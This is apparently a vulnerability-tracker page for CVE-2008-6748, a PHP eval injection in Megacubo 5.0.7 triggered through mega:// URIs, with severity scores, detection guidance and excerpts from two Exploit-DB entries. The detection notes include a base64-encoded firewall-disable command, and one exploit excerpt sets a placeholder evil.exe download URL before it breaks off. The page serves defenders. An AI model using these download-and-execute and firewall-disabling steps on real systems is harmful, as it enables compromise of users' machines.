CVE-2008-6748
published 2009-04-24CVE-2008-6748: Eval injection vulnerability in Megacubo 5.0.7 allows remote attackers to inject and execute arbitrary PHP code via the play action in a mega:// URI.
PriorityP357critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
3.74%
88.5th percentile
Eval injection vulnerability in Megacubo 5.0.7 allows remote attackers to inject and execute arbitrary PHP code via the play action in a mega:// URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| megacubo | megacubo | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for processes spawned via the mega:// URI handler containing pipe characters and PHP function calls (e.g., system(), base64_decode(), fputs(), fopen(), file_get_contents()) in the URI path — this is the eval injection payload pattern. ↗
- →Detect mega:// URI scheme invocations from browsers (Internet Explorer, Firefox) that contain the string 'play|con..' followed by PHP code constructs — this is the specific exploit trigger pattern. ↗
- →Alert on creation of executable files at c:/Megacubo.exe by the Megacubo application process, as the exploit drops a downloaded payload to this hardcoded path. ↗
- →Detect execution of 'netsh firewall set opmode mode = disable' (base64: bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==) as a child process of Megacubo, indicating successful exploitation and firewall disablement. ↗
- ·The exploit was tested specifically against Internet Explorer 7 and Mozilla Firefox 1.5 on Windows XP SP3; the mega:// URI handler registration is the attack surface, so scope detection to Windows hosts with Megacubo installed. ↗
- ·Megacubo is described as a PHP + Winbinder application, meaning the eval injection executes within the embedded PHP runtime bundled with the desktop application — not a web server context. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute
exploitdb·2009-01-01
CVE-2008-6748 Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute
Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute
---
Megacubo 5.0.7 download & Execute
by :JJunior
site: http://www.musicastop.com.br/
tested against Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3
software site: http://www.megacubo.net/tv/
download url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023
description:
"Megacubo is a IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows(2000,
XP and Vista)."
example exploit, download & Execute :
MegaCubo - download & Execute
// url download & exec code evil
evil = 'http://www.example.com/evil.exe';
// disable firewall encode base_64
firewall =
Exploit-DB
Megacubo 5.0.7 - 'mega://' Remote 'eval()' Injection
exploitdb·2008-12-30
CVE-2008-6748 Megacubo 5.0.7 - 'mega://' Remote 'eval()' Injection
Megacubo 5.0.7 - 'mega://' Remote 'eval()' Injection
---
pwn
# milw0rm.com [2008-12-30]
No writeups or analysis indexed.
http://osvdb.org/51106http://retrogod.altervista.org/9sg_megacubo.htmlhttp://secunia.com/advisories/33326http://www.securityfocus.com/archive/1/499654/100/0/threadedhttp://www.securityfocus.com/bid/33062https://exchange.xforce.ibmcloud.com/vulnerabilities/47697https://www.exploit-db.com/exploits/7623http://osvdb.org/51106http://retrogod.altervista.org/9sg_megacubo.htmlhttp://secunia.com/advisories/33326http://www.securityfocus.com/archive/1/499654/100/0/threadedhttp://www.securityfocus.com/bid/33062https://exchange.xforce.ibmcloud.com/vulnerabilities/47697https://www.exploit-db.com/exploits/7623
2009-04-24
Published